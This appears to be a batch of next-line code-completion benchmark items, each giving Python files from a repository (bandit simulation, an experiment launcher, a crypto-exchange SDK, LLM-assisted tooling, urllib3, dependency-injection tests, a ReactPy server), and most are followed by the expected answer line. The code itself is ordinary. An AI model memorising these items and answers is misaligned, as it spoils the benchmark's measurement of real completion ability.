You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: DURUII/Replica-AUCB # Path: arms.py class StrategicArm(NormalArm): c_min, c_max = 0.1, 1 def __init__(self): # in the paper, r is expected reward r = random.uniform(0.1, 1) # to make that sample value is within 0~1 with 97% sigma = random.uniform(0, min(r / 3, (1 - r) / 3)) super().__init__(r, sigma) # c for cost, b for bid, c_i = b_i according to the theorem 2 self.c = random.uniform(0.1, 1) self.b = self.c # Path: config.py class Config: N = 60 N_range = [50, 60, 70, 80, 90, 100] K = 20 K_range = [10, 20, 30, 40, 50] B = 5e5 B_range = [i * 10 for i in range(1, 11)] B_range = np.array(B_range) * 1e4 line_styles = { 'AUCB': {'color': '#060506', 'marker': 's', 'label': 'AUCB'}, 'optimal': {'color': '#ed1e25', 'marker': 'o', 'label': 'optimal'}, 'separated': {'color': '#3753a4', 'marker': '^', 'label': 'separated'}, '0.1-first': {'color': '#097f80', 'marker': 'v', 'label': '0.1-first'}, '0.5-first': {'color': '#ba529e', 'marker': '<', 'label': '0.5-first'}, } # bar style bar_width = 0.15 bar_styles = { 'AUCB': {'color': '#060506', 'label': 'AUCB', 'hatch': ''}, 'optimal': {'color': '#ed1e25', 'label': 'optimal', 'hatch': '||||'}, 'separated': {'color': '#3753a4', 'label': 'separated', 'hatch': '/////'}, '0.1-first': {'color': '#097f80', 'label': '0.1-first', 'hatch': '\\\\\\\\\\'}, '0.5-first': {'color': '#ba529e', 'label': '0.5-first', 'hatch': '---'}, } # Path: emulator.py class Emulator: algorithms = ['AUCB', 'optimal', 'separated', '0.1-first', '0.5-first'] def __init__(self, arms: list[StrategicArm] = None, n_arms: int = 60, n_selected: int = 20, budget: float = 5e5): self.N = n_arms self.K = n_selected self.B = budget self.arms = arms if arms is None: self.arms = [StrategicArm() for _ in range(self.N)] self.name2sol = {} def build(self): for algo in Emulator.algorithms: if algo == 'AUCB': self.name2sol[algo] = AUCB(self.arms, self.N, self.K, self.B) elif algo == 'optimal': self.name2sol[algo] = Opt(self.arms, self.N, self.K, self.B) elif algo == 'separated': self.name2sol[algo] = Separated(self.arms, self.N, self.K, self.B) elif algo.endswith('-first'): self.name2sol[algo] = EpsilonFirst(self.arms, self.N, self.K, self.B, float(algo[:-6])) def simulate(self): self.build() name2res = {name: None for name in self.name2sol.keys()} for name in name2res.keys(): # instance of an algorithm solver = self.name2sol[name] solver.initialize() name2res[name] = solver.run() return name2res # Path: main.py import os import pandas as pd import numpy as np import pickle from matplotlib import pyplot as plt from tqdm import tqdm from arms import StrategicArm from config import Config from emulator import Emulator """ Author: DURUII Date: 2023/12/17 """ plt.style.use(['science', 'grid']) config = Config # data preparation if not os.path.exists('./runs.pkl'): data = [] for X in ['N', 'K', 'B']: for x in tqdm(eval(f'config.{X}_range'), desc=X): if X == 'N':
name2res = Emulator(n_arms=x).simulate()
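main.py above sweeps one experiment knob at a time (N, K or B) and re-runs the emulator per value; a sketch of that sweep-and-collect loop with the emulator stubbed out (simulate_stub and the value lists are invented).
```
def simulate_stub(**kwargs):
    # Stand-in for Emulator(**kwargs).simulate(): returns algo -> result.
    return {"AUCB": sum(kwargs.values())}

kw_for = {"N": "n_arms", "K": "n_selected"}
data = []
for X, values in [("N", [50, 60]), ("K", [10, 20])]:
    for x in values:
        name2res = simulate_stub(**{kw_for[X]: x})
        data.append((X, x, name2res))
print(data)
```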
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: XLearning-SCU/2023-TPAMI-SMILE # Path: _MainLauncher.py def get_settings(): def clear_gpu_fail(root): def run(): def main(): # Path: _Utils/Launcher.py class Launcher(SubprocessOperator): def __init__(self, path_operator, env_config='', queue=None): self.path_operator = path_operator self.env_config = env_config self.queue = queue def show_tensorboard(self, path_to_runs): python_path = self.path_operator.python_path tensorboard_path = os.path.join(os.path.dirname(python_path), 'tensorboard') # self.__call__(cmd='find \'{}\' | grep tfevents'.format(path_to_runs)) # self.__call__(cmd='{} {} --inspect --logdir \'{}\''.format(python_path, tensorboard_path, path_to_runs)) self.__call__(cmd='{} {} --logdir \'{}\' {}'.format( python_path, tensorboard_path, path_to_runs, self.path_operator.tensorboard_arg)) def launch(self, cfg, run_file="main.py", safe_mode=True, model_name='Train', clean_fold=True): fold_path = self.path_operator.get_code_path(code_fold_name=cfg.get_name(), level=3) if os.path.exists(os.path.join(fold_path, 'Checkpoints')): warnings.warn('There are some checkpoints in "{}".'.format(fold_path)) if clean_fold: DirectoryOperator.FoldOperator(directory=fold_path).clear(delete_root=False, not_to_delete_file=safe_mode) code_root = os.path.join(fold_path, '{}Code'.format(model_name)) # if sys.platform != 'win32': # code_root = '"{}"'.format(code_root) DirectoryOperator.FoldOperator(directory='./').copy( dst_fold=code_root, not_to_delete_file=safe_mode, ignore=ignore_patterns('__pycache__', '.idea', '_bac')) python_cmd = '{} -u {} {}'.format( self.path_operator.python_path, # np.random.randint(0,1000), run_file, cfg.get_config(), ) txt_path = '"{:}.txt"'.format(os.path.join(fold_path, model_name)) if sys.platform != 'win32': py_cmd = "{append_config:} nohup {python_cmd:} > {txt_path:} 2>&1 &".format( append_config=self.env_config + ' CUDA_VISIBLE_DEVICES={}'.format(cfg.cuda), python_cmd=python_cmd, txt_path=txt_path, ) else: py_cmd = "start /b {python_cmd:} > {txt_path:} 2>&1".format( python_cmd=python_cmd, txt_path=txt_path, ) self.__call__( cmd="cd \"{code_root:}\" && {py_cmd:}".format( code_root=code_root, py_cmd=py_cmd, ) ) def quick_launch(self, settings, config_operator, **kwargs): """ settings: [cuda, [yaml_list], arg_dict] """ timer = Timer() total_count = len(settings) for cuda, yaml_list, arg_dict in settings: t_start = time.time() cfg = config_operator( yaml_list=yaml_list, cuda=cuda, **arg_dict, ) work_root = self.path_operator.get_code_path(code_fold_name=cfg.get_name(), level=3) if os.path.exists(work_root): print("Skipping a code running due to its log already exists. 
work_root == {}".format(work_root)) total_count -= 1 continue if self.queue is not None: self.queue.enqueue(work_root=work_root, cuda=cuda) self.launch( cfg=cfg, **kwargs ) timer.update(time.time()-t_start) timer.count -= 1 timer.show(total_count=total_count) timer.count += 1 if self.queue is not None: self.queue.close() # Path: _Utils/ConfigOperator.py class ConfigOperator: def __init__(self, cuda, yaml_list=None, **kwargs): self.config = EasyDict() self.cuda = cuda if yaml_list is not None: for yaml_path in yaml_list: with open(yaml_path, 'r') as stream: config = yaml.safe_load(stream) self.add_kwargs(**config) self.add_kwargs(**kwargs) self.config = EasyDict(dict(sorted(self.config.items()))) def add_kwargs(self, **kwargs): for k, v in kwargs.items(): if v == '': continue self.config[k] = v def get_config(self, for_path=False, *args, **kwargs): config = '' for k, val in self.config.items(): if isinstance(val, bool): if val: config += ' --{}'.format(k) elif isinstance(val, str) and (len(val.split('\\')) > 1 or len(val.split('/')) > 1): if for_path: config += ' --{} {}'.format( k, os.path.join(*val.replace('\\', '/').split('/')[-1:]).replace('/', '@')[:8], ) else: config += ' --{} \"{}\"'.format(k, val) else: config += ' --{} {}'.format(k, val) return config def get_name(self, *args, **kwargs): return "{}".format(self.get_config(for_path=True)) def show_config(self): print(self.config) # print(self.config.setup) # print(self.config.backbone) # print(self.config.model_kwargs) # print(self.config.model_kwargs.head) # Path: _AutoLauncher.py import time from _MainLauncher import path_operator from _Utils import Launcher from _Utils.ConfigOperator import ConfigOperator def main(): class C2(ConfigOperator): def get_name(self, *args, **kwargs): return '_QueueLog'
Launcher.Launcher(
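Launcher.launch quoted above assembles a platform-specific shell command; here is the string-building step in isolation, with the command and log path as placeholders.
```
import sys

python_cmd = "python -u main.py --lr 0.1"   # placeholder command
txt_path = '"./log/Train.txt"'              # placeholder log file
if sys.platform != "win32":
    cmd = f"nohup {python_cmd} > {txt_path} 2>&1 &"   # detach on *nix
else:
    cmd = f"start /b {python_cmd} > {txt_path} 2>&1"  # background on Windows
print(cmd)
```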
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: precisionalgorithms/loopring-python-SDK # Path: loopring/session.py class Session: """ Parent class for Loopring API. """ # Class variables api_key = None account_id = None headers = None base_url = 'https://api3.loopring.io/api/v3' @classmethod def initialize(cls): """ Initialize the Loopring API with API key and account ID. """ load_dotenv() cls.api_key = os.environ.get("API_KEY") cls.account_id = os.environ.get("ACCOUNT_ID") cls.headers = { 'Accept': 'application/json', 'X-API-KEY': cls.api_key } # Path: loopring/account.py class Account(Session): def get_account_balances( self, address: str = "", tokens: str = "" ) -> list[Balance]: """ Get the balances for the account associated with the API key. :param address: Address of the account to fetch balances for. :param tokens: List of token IDs to fetch balances for. :return: Dataclass. """ url = (f'{self.base_url}/user/balances?accountId={self.account_id}' f'&address={address}&tokens={tokens}') response = requests.get(url, headers=self.headers) if response.status_code == 200: data = response.json() return [Balance(**entry) for entry in data] else: print("Error fetching account balance:", response.status_code) return response.json() # Path: loopring/exchange.py class Exchange(Session): def get_tokens(self) -> list[TokenInfo]: """ Get the tokens supported by the Loopring protocol. :return: List of tokens. """ url = f'{self.base_url}/exchange/tokens' response = requests.get(url, headers=self.headers) if response.status_code == 200: data = response.json() return [TokenInfo(**entry) for entry in data] else: print("Error fetching tokens:", response.status_code) return response.json() def get_exchange_info(self) -> ExchangeInfo: """ Get the exchange info. :return: Exchange Info. """ url = f'{self.base_url}/exchange/info' response = requests.get(url, headers=self.headers) if response.status_code == 200: data = response.json() return ExchangeInfo(**data) else: print("Error fetching tokens:", response.status_code) return response.json() def get_markets(self) -> list[MarketInfo]: """ Get the markets supported by the Loopring protocol. :return: List of markets. """ url = f'{self.base_url}/exchange/markets' response = requests.get(url, headers=self.headers) if response.status_code == 200: data = response.json() return [MarketInfo(**entry) for entry in data['markets']] else: print("Error fetching markets:", response.status_code) return response.json() # Path: utils.py def join_balance_with_token_info( balances: List[Balance], tokens: List[TokenInfo] ) -> list[DetailedBalance]: """ Join the Balance dataclass with the TokenInfo dataclass. 
""" token_info_map = {token.tokenId: token for token in tokens} joined_data = [] for balance in balances: token_info = token_info_map.get(balance.tokenId) if token_info: combined_data = { 'accountId': balance.accountId, 'tokenId': balance.tokenId, 'total': balance.total, 'converted_total': convert_from_wei(balance.total, token_info.decimals), 'locked': balance.locked, 'pending': balance.pending, 'symbol': token_info.symbol, 'name': token_info.name, 'address': token_info.address, 'decimals': token_info.decimals } joined_data.append(combined_data) return [DetailedBalance(**entry) for entry in joined_data] # Path: main.py import pickle from loopring.session import Session from loopring.account import Account from loopring.exchange import Exchange from utils import join_balance_with_token_info # Initialize the Loopring API with API key and account ID Session.initialize() # Get the account balances account = Account() balances = account.get_account_balances() # Get token info on exchange
exchange = Exchange()
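join_balance_with_token_info above is an id-keyed join; below is the core map-then-enrich step, with plain dicts standing in for the Balance and TokenInfo dataclasses.
```
tokens = [{"tokenId": 0, "symbol": "ETH", "decimals": 18}]
balances = [{"tokenId": 0, "total": "1000000000000000000"}]

token_info = {t["tokenId"]: t for t in tokens}  # tokenId -> token record
joined = [{**b, "symbol": token_info[b["tokenId"]]["symbol"]}
          for b in balances if b["tokenId"] in token_info]
print(joined)
```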
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Liyulingyue/ModulelyTools # Path: codes/extraction/ipynb/ipynb_analyse.py def parse_ipynb(file_path): """ # 示例:使用函数解析一个ipynb文件 file_path = 'main.ipynb' # 请将此处替换为您的ipynb文件路径 result = parse_ipynb(file_path) print(result) """ # 读取ipynb文件 with open(file_path, 'r', encoding='utf-8') as f: nb = nbformat.read(f, as_version=4) # 初始化结果列表 parsed_cells = [] # 对每一个cell进行处理 for cell in nb.cells: cell_dict = {} if cell.cell_type == 'markdown': cell_dict['属性'] = 'Markdown' cell_dict['内容'] = cell.source cell_dict['输出'] = '' elif cell.cell_type == 'code': cell_dict['属性'] = 'Code' cell_dict['内容'] = cell.source cell_dict['输出'] = '' else: raise ValueError(f"Unsupported cell type: {cell.cell_type}") parsed_cells.append(cell_dict) return parsed_cells # Path: codes/extraction/ipynb/ipynb_analyse.py def get_ipynb_content(parsed_cells): ipynb_content = "" for i in range(len(parsed_cells)): if parsed_cells[i]['属性'] == "Code": ipynb_content += f"[Cell No. {i}]\n {parsed_cells[i]['内容']}\n\n" return ipynb_content # Path: codes/extraction/ipynb/ipynb_analyse.py def get_model_list(ipynb_content, llm): prompt = \ f""" 我将给你一些NoteBook中的测试代码,请你阅读这些代码,并根据代码内容进行架构设计,使用json格式返回设计结果。 NoteBook中的代码是{ipynb_content} Json返回的内容格式为: {str('{')} "模块":list[dict{str('{')}"Name":str, "Type":str, "Introduction":str{str('}')}] {str('}')} “模块”信息是一个list,每个元素是一个字典,包括了模块名称,模块类型(取值为"class"或"function"),模块介绍 """ json_data = llm.get_llm_json_answer(prompt) return json_data["模块"] # Path: codes/extraction/ipynb/ipynb_analyse.py def model_list2python(model_list, ipynb_content, llm): py_str = "" for model_dict in model_list: model_name = model_dict["Name"] model_type = model_dict["Type"] model_intro = model_dict["Introduction"] prompt = \ f""" 我将给你一个模块名称和模块类型,以及一些Notebook中的测试代码,并根据代码内容实现这个模块,使用json格式返回设计结果。 模块名称是{model_name},请定义为一个{model_type},模块的功能是{model_intro},NoteBook中的代码是{ipynb_content}。 Json返回的内容格式为: {str('{')} "代码":multi-lines str {str('}')} “代码”信息是一个多行字符串,内容是你根据NoteBook中的代码和模块的功能,对模块{model_name}的程序实现,请保证生成的代码可以直接运行,解释说明的内容采用注释标记。 """ # model_impl = get_llm_json_answer(prompt) try: model_impl = llm.get_llm_json_answer(prompt) py_str += model_impl["代码"] except: py_str += f"# 模块{model_name},类型是{model_type},生成失败" py_str += "\n\n" return py_str # Path: codes/extraction/py/py_analyse.py def extract_function_defs(node, function_defs): if isinstance(node, ast.FunctionDef): function_source = ast.unparse(node) function_defs.append([node.name, function_source, [arg.arg for arg in node.args.args], ast.get_docstring(node)]) elif isinstance(node, ast.ClassDef): function_source = ast.unparse(node) function_defs.append([node.name, function_source, [stmt.name for stmt in node.body if isinstance(stmt, ast.FunctionDef)], ast.get_docstring(node)]) else: for child in ast.iter_child_nodes(node): extract_function_defs(child, function_defs) # Path: codes/extraction/py/py_analyse.py def get_function_defs(code): tree = ast.parse(code) function_defs = [] extract_function_defs(tree, function_defs) return function_defs # a list, each element is [define of function/class, docstring] # Path: codes/extraction/py/py_analyse.py def get_intro_of_fun(fun_str, llm): try: prompt = f""" 请帮我为这个函数或者类写一段说明介绍,并且以json的形式返回给我。 需要解读的函数或者类是{fun_str} Json返回的内容格式为: 
{str('{')}" "说明介绍":str {str('}')} """ result = llm.get_llm_answer(prompt) try: json_dict = llm.extract_json_from_llm_answer(result) return json_dict["说明介绍"] except: return result except: return "输出失败" # Path: codes/extraction/ModuleTools.py from .ipynb.ipynb_analyse import parse_ipynb, get_ipynb_content, get_model_list, model_list2python from .py.py_analyse import extract_function_defs, get_function_defs, get_intro_of_fun from ..llm.Ernie import Ernie from ..llm.Ernie import Ernie class ModuleTools(object): def __init__(self, llm_type="Ernie"): super.__init__() if llm_type=="Ernie": self.llm = Ernie() else: # default set ernie as used llm self.llm = Ernie() def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""):
result = parse_ipynb(ipynb_path)
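parse_ipynb above walks notebook cells via nbformat; an in-memory variant built with nbformat's v4 helpers, so no .ipynb file is needed to try it.
```
import nbformat

nb = nbformat.v4.new_notebook()
nb.cells.append(nbformat.v4.new_markdown_cell("# Title"))
nb.cells.append(nbformat.v4.new_code_cell("print('hi')"))

# Same cell walk as parse_ipynb: branch on cell_type, keep the source.
code_cells = [c.source for c in nb.cells if c.cell_type == "code"]
print(code_cells)  # ["print('hi')"]
```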
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Azure-Samples/functions-python-web-crawler # Path: .venv/Lib/site-packages/urllib3/util/connection.py _TYPE_SOCKET_OPTIONS = typing.Sequence[typing.Tuple[int, int, typing.Union[int, bytes]]] # Path: .venv/Lib/site-packages/urllib3/util/timeout.py _DEFAULT_TIMEOUT: Final[_TYPE_DEFAULT] = _TYPE_DEFAULT.token # Path: .venv/Lib/site-packages/urllib3/util/timeout.py _TYPE_TIMEOUT = typing.Optional[typing.Union[float, _TYPE_DEFAULT]] # Path: .venv/Lib/site-packages/urllib3/util/url.py class Url( typing.NamedTuple( "Url", [ ("scheme", typing.Optional[str]), ("auth", typing.Optional[str]), ("host", typing.Optional[str]), ("port", typing.Optional[int]), ("path", typing.Optional[str]), ("query", typing.Optional[str]), ("fragment", typing.Optional[str]), ], ) ): """ Data structure for representing an HTTP URL. Used as a return value for :func:`parse_url`. Both the scheme and host are normalized as they are both case-insensitive according to RFC 3986. """ def __new__( # type: ignore[no-untyped-def] cls, scheme: str | None = None, auth: str | None = None, host: str | None = None, port: int | None = None, path: str | None = None, query: str | None = None, fragment: str | None = None, ): if path and not path.startswith("/"): path = "/" + path if scheme is not None: scheme = scheme.lower() return super().__new__(cls, scheme, auth, host, port, path, query, fragment) @property def hostname(self) -> str | None: """For backwards-compatibility with urlparse. We're nice like that.""" return self.host @property def request_uri(self) -> str: """Absolute path including the query string.""" uri = self.path or "/" if self.query is not None: uri += "?" + self.query return uri @property def authority(self) -> str | None: """ Authority component as defined in RFC 3986 3.2. This includes userinfo (auth), host and port. i.e. userinfo@host:port """ userinfo = self.auth netloc = self.netloc if netloc is None or userinfo is None: return netloc else: return f"{userinfo}@{netloc}" @property def netloc(self) -> str | None: """ Network location including host and port. If you need the equivalent of urllib.parse's ``netloc``, use the ``authority`` property instead. """ if self.host is None: return None if self.port: return f"{self.host}:{self.port}" return self.host @property def url(self) -> str: """ Convert self into a url This function should more or less round-trip with :func:`.parse_url`. The returned url may not be exactly the same as the url inputted to :func:`.parse_url`, but it should be equivalent by the RFC (e.g., urls with a blank port will have : removed). Example: .. 
code-block:: python import urllib3 U = urllib3.util.parse_url("https://google.com/mail/") print(U.url) # "https://google.com/mail/" print( urllib3.util.Url("https", "username:password", "host.com", 80, "/path", "query", "fragment" ).url ) # "https://username:[email protected]:80/path?query#fragment" """ scheme, auth, host, port, path, query, fragment = self url = "" # We use "is not None" we want things to happen with empty strings (or 0 port) if scheme is not None: url += scheme + "://" if auth is not None: url += auth + "@" if host is not None: url += host if port is not None: url += ":" + str(port) if path is not None: url += path if query is not None: url += "?" + query if fragment is not None: url += "#" + fragment return url def __str__(self) -> str: return self.url # Path: .venv/Lib/site-packages/urllib3/_base_connection.py import typing import ssl from .util.connection import _TYPE_SOCKET_OPTIONS from .util.timeout import _DEFAULT_TIMEOUT, _TYPE_TIMEOUT from .util.url import Url from typing import Literal, Protocol from .response import BaseHTTPResponse from __future__ import annotations _TYPE_BODY = typing.Union[bytes, typing.IO[typing.Any], typing.Iterable[bytes], str] class ProxyConfig(typing.NamedTuple): ssl_context: ssl.SSLContext | None use_forwarding_for_https: bool assert_hostname: None | str | Literal[False] assert_fingerprint: str | None class _ResponseOptions(typing.NamedTuple): # TODO: Remove this in favor of a better # HTTP request/response lifecycle tracking. request_method: str request_url: str preload_content: bool decode_content: bool enforce_content_length: bool if typing.TYPE_CHECKING: class BaseHTTPConnection(Protocol): default_port: typing.ClassVar[int] default_socket_options: typing.ClassVar[_TYPE_SOCKET_OPTIONS] host: str port: int timeout: None | ( float ) # Instance doesn't store _DEFAULT_TIMEOUT, must be resolved. blocksize: int source_address: tuple[str, int] | None socket_options: _TYPE_SOCKET_OPTIONS | None
proxy: Url | None
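BaseHTTPConnection above is an attribute-only typing.Protocol; a small self-contained example of that structural-typing style (all names below are invented).
```
from typing import Optional, Protocol

class HasEndpoint(Protocol):
    # Annotations alone declare the required attributes; no bodies needed.
    host: str
    port: int
    proxy: Optional[str]

class Conn:
    host, port, proxy = "localhost", 80, None

def describe(c: HasEndpoint) -> str:
    return f"{c.host}:{c.port}"

print(describe(Conn()))
```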
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: neuroglia-io/python-framework # Path: tests/services.py class FileLogger(LoggerBase): def log(text: str): with open('example.txt', 'a') as file: file.write(f'{text}\n') # Path: tests/services.py class LoggerBase(ABC): @abstractclassmethod def log(text: str): raise NotImplementedError() # Path: tests/services.py class NullLogger(LoggerBase): def log(text: str): pass # Path: tests/services.py class PrintLogger(LoggerBase): def log(text: str): print(text) # Path: tests/cases/test_service_provider.py from re import T from sys import implementation from neuroglia.dependency_injection.service_provider import IServiceProvider, ServiceCollection, ServiceProvider from tests.services import FileLogger, LoggerBase, NullLogger, PrintLogger import pytest class TestServiceProvider: def test_build_should_work(self): #arrange services = ServiceCollection() services.add_singleton(LoggerBase, PrintLogger) services.add_singleton(LoggerBase, singleton = FileLogger()) services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger) #act service_provider = services.build() #assert assert service_provider is not None, 'service_provider is none' def test_get_service_should_work(self): #arrange services = ServiceCollection() implementation_type = PrintLogger services.add_singleton(LoggerBase, implementation_type) service_provider = services.build() #act logger = service_provider.get_service(LoggerBase) #assert assert logger is not None, 'logger is none' assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'" def test_get_unregistered_service_should_work(self): #arrange services = ServiceCollection() service_provider = services.build() #act logger = service_provider.get_service(LoggerBase) #assert assert logger is None, 'logger is not none' def test_get_required_service_should_work(self): #arrange services = ServiceCollection() implementation_type = PrintLogger services.add_singleton(LoggerBase, implementation_type) service_provider = services.build() #act logger = service_provider.get_required_service(LoggerBase) #assert assert logger is not None, 'logger is none' assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'" def test_get_required_unregistered_service_should_raise_error(self): #arrange services = ServiceCollection() service_provider = services.build() #assert with pytest.raises(Exception): service_provider.get_required_service(LoggerBase)() def test_get_scoped_service_from_root_should_raise_error(self): #arrange services = ServiceCollection() implementation_type = PrintLogger services.add_scoped(LoggerBase, implementation_type) service_provider = services.build() #assert with pytest.raises(Exception): service_provider.get_required_service(LoggerBase)() def test_get_services_should_work(self): #arrange services = ServiceCollection() services.add_singleton(LoggerBase, PrintLogger) services.add_singleton(LoggerBase, singleton = FileLogger()) services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger) service_provider = services.build() #act loggers = service_provider.get_services(LoggerBase) #assert assert len(loggers) == 
3, f'expected 3 loggers, got {len(loggers)}' def test_create_scope_should_work(self): pass def test_get_scoped_service_should_work(self): pass
def _build_null_logger(self, provider : IServiceProvider) -> NullLogger: return NullLogger()
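The tests above register singletons three ways (by type, by instance, by factory); a toy provider (ProviderStub, invented) shows why get_services can then yield three loggers.
```
class ProviderStub:
    def __init__(self):
        self._regs = {}

    def add(self, key, kind, value):
        self._regs.setdefault(key, []).append((kind, value))

    def get_services(self, key):
        # Factories get the provider; instances and types pass through as-is.
        return [v(self) if k == "factory" else v
                for k, v in self._regs.get(key, [])]

p = ProviderStub()
p.add("logger", "type", "PrintLogger")
p.add("logger", "instance", "FileLogger()")
p.add("logger", "factory", lambda prov: "NullLogger()")
print(len(p.get_services("logger")))  # 3
```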
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Vlodson/Faculty-Choice-Assistant # Path: backend/llm/threads.py def make_thread_for_user() -> Thread: return CLIENT.beta.threads.create() # Path: backend/llm/threads.py def retrieve_thread_for_user(thread_id: str) -> Thread: return CLIENT.beta.threads.retrieve(thread_id=thread_id) # Path: backend/llm/threads.py def send_setup_message(thread: Thread) -> ThreadMessage: msg = ( "The file ontology.ttl has an RDF ontology in turtle syntax. " + "Please review the contents of the file. " + "After that each prompt will ask you to create a SPARQL query for a certain question, " + "using ONLY information from ontology.ttl. " + "Always add: PREFIX edu: <YOUR_ONTOLOGY.TTL_PATH_HERE> to your queries" ) return CLIENT.beta.threads.messages.create( thread_id=thread.id, role="user", content=msg ) # Path: backend/llm/threads.py def send_user_message(thread: Thread, msg: str) -> ThreadMessage: return CLIENT.beta.threads.messages.create( thread_id=thread.id, role="user", content=__contextualize_user_message(msg) ) # Path: backend/llm/threads.py def create_run_for_thread(thread: Thread, run: Optional[Run] = None) -> Run: if not run: return CLIENT.beta.threads.runs.create( thread_id=thread.id, assistant_id=ASSISTANT.id ) run_info = retrieve_run_for_user(run_id=run.id, thread_id=thread.id) while run.status != "completed": run_info = retrieve_run_for_user(run_id=run_info.id, thread_id=thread.id) return CLIENT.beta.threads.runs.create( thread_id=thread.id, assistant_id=ASSISTANT.id ) # Path: backend/llm/threads.py def retrieve_run_for_user(run_id: str, thread_id: str) -> Run: return CLIENT.beta.threads.runs.retrieve(run_id=run_id, thread_id=thread_id) # Path: backend/llm/threads.py def get_last_message(thread: Thread, run: Run) -> ThreadMessage: # wait untill the message is done writing # this does not have any fail exits run_info = CLIENT.beta.threads.runs.retrieve(run_id=run.id, thread_id=thread.id) while run_info.status != "completed": run_info = CLIENT.beta.threads.runs.retrieve(run_id=run.id, thread_id=thread.id) return list(msg for msg in CLIENT.beta.threads.messages.list(thread.id))[0] # Path: backend/llm/threads.py def get_query_from_message(msg: ThreadMessage) -> Optional[str]: raw_msg = msg.content[0].text.value start_delim = r"```sparql" end_delim = r"```" start_index = raw_msg.find(start_delim) end_index = raw_msg.find(end_delim, start_index + len(start_delim)) if start_index != -1 and end_index != -1: return raw_msg[start_index + len(start_delim) : end_index] return None # Path: backend/ontology/queries.py def apply_query(query: str) -> Result: return GRAPH.query(query_object=query) # Path: backend/ontology/queries.py def query_results_to_table(results: Result) -> Dict: return { __readable_property_name(str(key)): [ __clean_property_value(str(row[key])) for row in results ] for key in results.__dict__["vars"] } # Path: backend/server/endpoints/custom_types.py class SendMessageRequest(TypedDict): thread_id: str run_id: str msg: str # Path: backend/server/endpoints/custom_types.py class SetupUserResponse(TypedDict): thread_id: str run_id: str # Path: backend/server/endpoints/natural_language.py from flask import Blueprint, abort, request, jsonify from backend.llm.threads import ( 
make_thread_for_user, retrieve_thread_for_user, send_setup_message, send_user_message, create_run_for_thread, retrieve_run_for_user, get_last_message, get_query_from_message, ) from backend.ontology.queries import apply_query, query_results_to_table from backend.server.endpoints.custom_types import SendMessageRequest, SetupUserResponse bp = Blueprint("llm", __name__) @bp.route("/setup", methods=["GET"]) def setup_user() -> SetupUserResponse: thread = make_thread_for_user() _ = send_setup_message(thread)
run = create_run_for_thread(thread) # for easier expansion of the API
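create_run_for_thread and get_last_message above poll a run until its status is "completed"; here is that polling loop in isolation, with fetch_run standing in for CLIENT.beta.threads.runs.retrieve.
```
import time

def wait_until_completed(fetch_run, run_id, thread_id, poll_s=0.01):
    run = fetch_run(run_id=run_id, thread_id=thread_id)
    while run["status"] != "completed":
        time.sleep(poll_s)
        run = fetch_run(run_id=run_id, thread_id=thread_id)
    return run

states = iter([{"status": "in_progress"}, {"status": "completed"}])
print(wait_until_completed(lambda **kw: next(states), "r1", "t1"))
```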
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: stevej2608/reactpy-apexcharts # Path: utils/logger.py # Path: utils/var_name.py def var_name(obj: Any, namespace: Dict[str, Any]) -> str: """Return var name as a string Args: obj (Any): Variable ty be named namespace (Dict[str, Any]): _description_ Returns: str: The objects name Usage: ``` from utils.var_name import var_name app = FastAPI(...) app_name = var_name(app, globals()) ``` """ return [name for name in namespace if namespace[name] is obj][0] # Path: utils/fast_server_options.py DEFAULT_OPTIONS=Options( head=html.head( html.meta(META_VIEWPORT), html.meta(META_COLOR), html.title(PAGE_HEADER_TITLE), ) ) # Path: utils/fast_server.py from typing import Callable from fastapi import FastAPI from reactpy.core.component import Component from reactpy.backend.fastapi import configure, Options from .logger import log, logging from .var_name import var_name from .fast_server_options import DEFAULT_OPTIONS import sys import signal import multiprocessing import uvicorn app = FastAPI(description="ReactPy", version="0.1.0") LOGS = [ "asgi-logger", "concurrent.futures", "concurrent", "asyncio", "uvicorn.error", "uvicorn", "watchfiles.watcher", "watchfiles", "watchfiles.main", "fastapi", "reactpy.backend", "reactpy", "reactpy._option", "reactpy.core.hooks", "reactpy.core", "urllib3.util.retry", "urllib3.util", "urllib3", "urllib3.connection", "urllib3.response", "urllib3.connectionpool", "urllib3.poolmanager", "charset_normalizer", "requests", "reactpy.web.utils", "reactpy.web", "reactpy.web.module", "reactpy.backend.utils", "reactpy.core.layout", "reactpy.core.serve", "reactpy.backend.starlette", "uvicorn.access", "starlette", ] def disable_noisy_logs(): # Turn off noisy logging for log_id in LOGS: _log = logging.getLogger(log_id) _log.setLevel(logging.ERROR) def handler(signum, frame): active = multiprocessing.active_children() for child in active: child.terminate() def run(AppMain: Callable[[], Component], options:Options=DEFAULT_OPTIONS, host='127.0.0.1', port=8000, disable_server_logs=False, **kwargs) -> None: """Called once to run reactpy application on the fastapi server Args: AppMain (Callable[[], Component]): Function that returns a reactpy Component options (Options, optional): Server options. Defaults to DASHBOARD_OPTIONS. Usage: ``` @component def AppMain(): return html.h2('Hello from reactPy!') ) run(AppMain, options=PICO_OPTIONS) ``` 